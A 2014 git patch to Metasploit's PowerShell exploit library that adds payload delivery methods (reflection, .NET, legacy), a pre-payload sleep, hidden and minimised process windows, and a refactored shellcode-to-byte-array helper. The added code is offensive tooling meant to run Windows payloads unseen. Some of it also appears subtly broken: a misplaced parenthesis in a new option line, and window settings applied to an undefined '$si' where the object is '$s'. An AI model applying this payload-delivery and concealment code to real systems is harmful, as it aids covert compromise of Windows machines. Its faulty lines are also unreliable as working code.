From 0056c260470815eeb2c629d506940fb49b7ef626 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Wed, 12 Feb 2014 22:06:18 -0500
Subject: [PATCH] import msf exploit

---
 lib/msf/core/exploit/powershell.rb | 75 +++++++++++++++++++++---------
 1 file changed, 53 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index e918e7fd4b..42ce1559ae 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -12,11 +12,17 @@ module Exploit::Powershell
     register_advanced_options(
       [
         OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
-        OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::prepend_sleep'), [false, 'Prepend seconds of sleep']),
         OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
         OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
         OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
         OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+        OptEnum.new('PSH::method', [true, 'Payload delivery method', 'reflection', [
+          'net',
+          'reflection',
+          'old',
+          'msil'
+        ]]),
       ], self.class)
   end
 
@@ -144,7 +150,7 @@ module Exploit::Powershell
     end
 
     # Shorten args if PSH 2.0+
-    unless datastore['PSH::old_technique']
+    unless datastore['PSH::method'] == 'old'
       arg_string.gsub!(' -Command ', ' -c ')
       arg_string.gsub!(' -EncodedCommand ', ' -e ')
       arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
@@ -178,7 +184,7 @@ module Exploit::Powershell
     end
 
     # Old technique fails if powershell exits..
-    arg_opts[:noexit] = true if datastore['PSH::old_technique']
+    arg_opts[:noexit] = true if datastore['PSH::method'] == 'old'
 
     ps_args = generate_psh_args(arg_opts)
 
@@ -193,6 +199,9 @@ $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
 $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
+$si.RedirectStandardOutput = $true
+$si.WindowStyle = 'Hidden'
+$si.CreateNoWindow = $True
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
     process_start_info.gsub!("\n",';')
@@ -231,6 +240,17 @@ EOS
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
 
+    psh_payload = case datastore['PSH::method']
+    when 'net'
+      Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    when 'reflection'
+      Msf::Util::EXE.to_win32pe_psh_reflection(framework, pay)
+    when 'old'
+      Msf::Util::EXE.to_win32pe_psh(framework, pay)
+    when 'msil'
+      raise "Not in framework anymore"
+    end
+
     # Run our payload in a while loop
     if datastore['PSH::persist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
@@ -239,6 +259,13 @@ EOS
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
+    if datastore['PSH::prepend_sleep']
+      if datastore['PSH::prepend_sleep'].to_i > 0
+        psh_payload = "Start-Sleep -s #{datastore['PSH::prepend_sleep']};" << psh_payload
+      else
+        vprint_error('Sleep time must be greater than 0 seconds')
+      end
+    end
 
     compressed_payload = compress_script(psh_payload)
     encoded_payload = encode_script(psh_payload)
@@ -297,7 +324,7 @@ EOS
     if opts[:remove_comspec]
       command = psh_command
     else
-      command = "%COMSPEC% /b /c #{psh_command}"
+      command = "%COMSPEC% /b /c start /min #{psh_command}"
     end
 
     vprint_status("Powershell command length: #{command.length}")
@@ -337,23 +364,24 @@ EOS
       return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
     end
 
-	#
-	# Convert binary to byte array, read from file if able
-	#
-	def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-		code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-		code = code.unpack('C*')
-		psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-		lines = []
-		1.upto(code.length-1) do |byte|
-			if(byte % 10 == 0)
-				lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-			else
-				lines.push ",0x#{code[byte].to_s(16)}"
-			end
-		end
-		psh << lines.join("") + "\r\n"
-	end
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length-1) do |byte|
+        if(byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      return psh << lines.join("") + "\r\n"
+    end
 
     #
     # Find PID of file locker
@@ -362,10 +390,13 @@ EOS
       return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
 
-
+    #
+    # Return last time of login for each user
+    #
     def self.get_last_login(user)
       return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end
+
   end
 end
 end